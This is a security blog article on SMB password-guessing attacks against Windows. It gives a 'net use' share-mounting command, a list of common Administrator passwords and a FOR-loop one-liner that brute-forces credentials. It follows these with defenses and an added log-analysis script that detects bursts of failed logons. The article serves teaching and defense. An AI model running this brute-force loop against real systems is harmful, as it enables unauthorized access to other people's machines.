Security Information and Review

Collection of security information and review

Microsoft Windows Authentication Spoofing Attack

Author : Admin

A common way to attack a Microsoft Windows system is through the Windows File and Print Sharing service, which operates over a protocol called SMB (Server Message Block). SMB listens on TCP ports 445 and 139 (also known as the NetBIOS-based service). Attackers also commonly use password guessing against Microsoft Remote Procedure Call (MSRPC) listening on TCP port 135, Terminal Services on TCP port 3389, and other services.

 

In this discussion, we describe how a Windows system is attacked via password guessing, assuming that SMB is accessible. The most effective method for breaking into a Windows system is remote share mounting, such as IPC$ or C$. A username and password combination is used to connect to an enumerated share. We will use the net use command like this:

C:\>net use \\computer_name\IPC$ * /u:Administrator

A simple and easy password-guessing technique is to script it via the command line. In this script, we will use a simple loop built on the Windows command shell FOR command in combination with the net use syntax. As a first step, we create a simple username and password file based on common username and password combinations. Any delimiter, such as tabs, can be used to separate the values. Save the file as c:\listpassword.txt, like this:

password 		username
 
password	Administrator
admin		Administrator
administrator	Administrator
secret		Administrator
4dm1n		Administrator
…

As a second step, run a command line to automate the password guessing, like this:

C:\>FOR /F "tokens=1,2*" %i in (listpassword.txt) do net use \\computer_name\IPC$ %i /u:%j

Next, how do we prevent password guessing? The solutions below assume that the SMB protocol remains active.

 

First, use the built-in Windows Firewall to restrict access to potentially vulnerable services such as SMB, MSRPC and Terminal Services. Disable unnecessary services and block them with Windows Firewall.

 

Second, enforce the use of strong passwords through policy. Microsoft has historically provided a number of ways to automatically require users to use strong passwords, such as the account policy.

 

Third, set an account lockout threshold and ensure that it applies to the built-in Administrator account. Setting an account lockout threshold is one of the most important steps to take to mitigate SMB password guessing attacks.

 

Fourth, log account logon failures and regularly review the event logs. It is wise to log failed logon attempts using audit policy, but enabling auditing is not enough. We must regularly review the logs for evidence of intruders.
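
The log review in the fourth step can be automated. The following is an added example, not part of the original article: it scans exported logon events for bursts of failed network logons from one source against one account, and notes when a successful logon follows the burst. The CSV column layout, the sample rows, the threshold of 5 and the 10-minute window are assumptions of this example; event IDs 4625 (failed logon) and 4624 (successful logon) and logon type 3 (network) are the values recorded by Windows Vista and later.

```python
import csv
import io
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample Security-log export (the column layout is an assumption).
SAMPLE_CSV = """TimeCreated,EventID,LogonType,TargetUserName,IpAddress
2024-01-10T09:00:01,4625,3,Administrator,192.0.2.50
2024-01-10T09:00:02,4625,3,Administrator,192.0.2.50
2024-01-10T09:00:03,4625,3,Administrator,192.0.2.50
2024-01-10T09:00:04,4625,3,Administrator,192.0.2.50
2024-01-10T09:00:05,4625,3,Administrator,192.0.2.50
2024-01-10T09:00:09,4624,3,Administrator,192.0.2.50
2024-01-10T09:10:00,4625,2,alice,127.0.0.1
2024-01-10T11:30:00,4625,3,bob,198.51.100.7
2024-01-10T14:45:00,4625,3,bob,198.51.100.7
"""

def find_guessing_bursts(csv_text, threshold=5, window=timedelta(minutes=10)):
    """Flag (source, account) pairs with >= threshold failed network logons
    inside `window`, and note whether a successful logon followed the burst."""
    failures = defaultdict(deque)   # (source IP, account) -> recent failure times
    alerts = {}
    rows = sorted(csv.DictReader(io.StringIO(csv_text)),
                  key=lambda r: r["TimeCreated"])
    for row in rows:
        if row["LogonType"] != "3":            # 3 = network logon (SMB, net use)
            continue
        when = datetime.fromisoformat(row["TimeCreated"])
        key = (row["IpAddress"], row["TargetUserName"])
        if row["EventID"] == "4625":           # failed logon
            times = failures[key]
            times.append(when)
            while when - times[0] > window:    # drop failures outside the window
                times.popleft()
            if len(times) >= threshold:
                alert = alerts.setdefault(key, {
                    "source": key[0], "account": key[1], "failures": 0,
                    "first_failure": times[0], "success_after": False})
                alert["failures"] = max(alert["failures"], len(times))
                alert["last_failure"] = when
        elif row["EventID"] == "4624" and key in alerts:   # successful logon
            if when - alerts[key]["last_failure"] <= window:
                alerts[key]["success_after"] = True        # a guess may have worked
    return list(alerts.values())

if __name__ == "__main__":
    for alert in find_guessing_bursts(SAMPLE_CSV):
        print(alert)
```

An alert with success_after set deserves the most urgent review, because it means the burst of failures ended in a valid logon from the same source.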

 

We hope this discussion can provide benefits and increase the quality of our knowledge.

 

 

Mohamad Widodo


Categories: Windows Security